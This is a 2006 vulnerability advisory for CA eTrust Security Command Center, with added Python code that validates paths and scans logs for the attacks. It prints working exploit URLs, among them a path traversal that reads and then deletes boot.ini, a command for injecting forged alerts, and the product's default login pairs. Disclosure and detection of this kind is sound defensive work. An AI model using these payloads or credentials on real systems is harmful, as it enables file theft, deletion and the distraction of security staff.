Computer Associates eTrust Security Command Center - Multiple Vulnerabilities
Release Date:
22-Sep-2006
Software:
Computer Associates - eTrust Security Command Center
http://www3.ca.com/solutions/Product.aspx?ID=4351
"eTrust Security Command Center helps you discover and prioritize
relevant security data to effectively manage your security risks in real
time. By correlating security risks to assets, you can take corrective
action and investigate security incidents through a centralized command
and control center."
Versions affected:
eTrust Security Command Center 1.0, r8, r8 SP1 CR1 and r8 SP1 CR2.
eTrust Audit 1.5 and r8.
Vulnerabilities discovered:
1) Reveal web server path.
2) Read and delete arbitrary files from the host server under
the service account, generally LocalSystem.
3) The event alerting does not use authentication, and as such is
vulnerable to external replay attacks, similar to IDS replay attacks.
Vulnerability impact:
Medium - A malicious authenticated user may read and delete arbitrary
files, whilst an unauthenticated attacker may use a replay
attack to distract staff from tracking real events, and/or
cause a denial of service by consuming disk space with false alerts.
Vulnerability information:
The software is operated by use of a web browser. Authenticated users have
access to the various security reports and functions, which generally do
not verify user-controlled parameters.
1) The 'ePPIServlet' script returns a detailed path error when sent the
quote character [ ' ] as part of the 'PIProfile' function.
2) The 'eSMPAuditServlet' class contains a function, 'getadhochtml',
which is used to provide reporting functionality. The component generates
reports in a temporary file location, returns the file contents to the
web client, then deletes it... but does not validate the path.
3) There is an API function to create your own alerts: eTSAPISend.exe.
The service does not use any authentication, so the attacker may script
the binary to send thousands of false-positive alerts to the Security
Command Center, diverting attention and resources from real threats.
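The check that item 2 says is missing, as an added sketch in Python (not the product's code and not the vendor's fix): the client-supplied file name is resolved against a fixed report directory and rejected before any read or delete if it lands elsewhere. REPORT_DIR, resolve_report_path and serve_and_delete are hypothetical names; the advisory does not give the real temporary location.

```python
import ntpath  # Windows path rules, usable on any platform

# Hypothetical report directory; the advisory does not name the real one.
REPORT_DIR = r"C:\escc\temp\reports"

def resolve_report_path(user_value, base=REPORT_DIR):
    """Map a client-supplied report name to a path inside `base`.

    Raises ValueError when the name would resolve anywhere else, so the
    caller never opens (or deletes) a file outside the report directory.
    """
    if not user_value or "\x00" in user_value:
        raise ValueError("empty or NUL-containing name")
    name = user_value.replace("/", "\\")   # Windows accepts both separators
    drive, _ = ntpath.splitdrive(name)
    if drive or name.startswith("\\"):
        raise ValueError("absolute, drive-letter or UNC path")
    if ":" in name:
        raise ValueError("stream or device syntax")
    root = ntpath.normpath(base)
    candidate = ntpath.normpath(ntpath.join(root, name))
    try:
        # Compare whole path components; a plain prefix test would accept
        # a sibling directory whose name merely starts with "reports".
        inside = ntpath.commonpath([root, candidate]) == root
    except ValueError:                       # e.g. different drives
        inside = False
    if not inside or candidate == root:
        raise ValueError("resolves outside the report directory")
    return candidate

def serve_and_delete(user_value, read, delete):
    """Read-then-delete flow from item 2, gated on the check above.
    `read` and `delete` are injected callables standing in for file I/O."""
    path = resolve_report_path(user_value)   # raises before any file access
    body = read(path)
    delete(path)
    return body
```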
Examples (lines have been wrapped):
1) https://escc-server.example.com:8080/etrust/servlet/ePPIServlet?
PIProfile=eAV_Report's&PIName=Generate+Pre-7.1+Report+Data&profile=
Threat+Management&node=
Would return an error similar to: "Cannot read profile:
C:\Program Files\Computer Associates\eTrust\Command Centre\servlet\.. "
2) https://escc-server.example.com:8080/etrust/servlet/eSMPAuditServlet?
verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini
Assuming the product was installed on the C drive, this will return the
contents of c:\boot.ini to the client, then immediately delete it, e.g:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows 2003 Server"
3) An example Windows Logon failure event would be similar to:
C:\> etsapisend.exe -nod $dstIP -cat "System Access" -opr Logon
-sta F -nam NT-Security -loc \\Domain\IIS_Server -usr System -evt 70
-src Security -nid 529 -inf "Logon Failure"
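For defenders reviewing web server logs, the requests in examples 1 and 2 can be recognised as follows. This is an added example, not part of the original advisory; the log layout and the sample lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - analyst1 [22/Sep/2006:10:01:02 +1000] "GET /etrust/servlet/'
    'eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=adhoc_1234.htm HTTP/1.1" 200 5120',
    '198.51.100.7 - threat [22/Sep/2006:10:04:11 +1000] "GET /etrust/servlet/'
    'eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini HTTP/1.1" 200 194',
    '198.51.100.7 - threat [22/Sep/2006:10:04:40 +1000] "GET /etrust/servlet/'
    'eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=..%5C..%5C..%5Cboot.ini HTTP/1.1" 200 194',
    '198.51.100.7 - threat [22/Sep/2006:10:05:02 +1000] "GET /etrust/servlet/'
    'ePPIServlet?PIProfile=eAV_Report%27s&profile=Threat+Management&node= HTTP/1.1" 200 310',
]

def fully_decode(value, rounds=3):
    """Undo percent-encoding that was applied more than once."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    servlet = url.path.rsplit("/", 1)[-1].lower()
    query = parse_qs(url.query, keep_blank_values=True)
    p = {k.lower(): fully_decode(v[-1]) for k, v in query.items()}
    if servlet == "esmpauditservlet" and p.get("verb", "").lower() == "getadhochtml":
        name = p.get("esccadhochtmlfile", "").replace("\\", "/")
        if ".." in name.split("/") or name.startswith("/") or re.match(r"[A-Za-z]:", name):
            return "traversal in eSCCAdHocHtmlFile"
    if servlet == "eppiservlet" and "'" in p.get("piprofile", ""):
        return "quote in PIProfile"
    return None

def scan(lines):
    """Return (line_number, label) for every line that matches."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, label) for n, label in hits if label]
```

Because the servlet deletes the file after returning it, a hit on eSCCAdHocHtmlFile is also a prompt to check whether the named file still exists on the server.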
Exploitation Requirement:
Fortunately, the web service requires product-based authentication prior
to execution for 1 and 2. Unfortunately, the product ships with multiple
default usernames and passwords which, although unlikely, may still be
present. The default username:password pairs are below:
eadmin:eadmin
iam:iam
threat:threat
admin:admin
For point 3, the $dstIP must have the Audit Router socket open (tcp/111).
Solution:
1) Fixes QO81875, QO81758, QO81862, QO81863 ...
2) Fixes QO81851, QO81876, QO81878 can be found at:
http://supportconnectw.ca.com/public/eTrust/eTrust_scc/downloads/eTrustscc_updates.asp
3) No solution - use perimeter-based firewalls.
References:
aushack.com advisory
http://www.aushack.com/advisories/200608-computerassociates.txt
Credit:
Patrick Webster ( patrick (at) aushack (dot) com )
Thanks to the CA Security team for their quick response.
Disclosure timeline:
21-Jan-2006 - Vulnerabilities discovered.
04-Aug-2006 - Sent to Computer Associates Security Advisor.
04-Aug-2006 - Vendor response & verification.
19-Sep-2006 - Vendor patch release.
22-Sep-2006 - Public disclosure.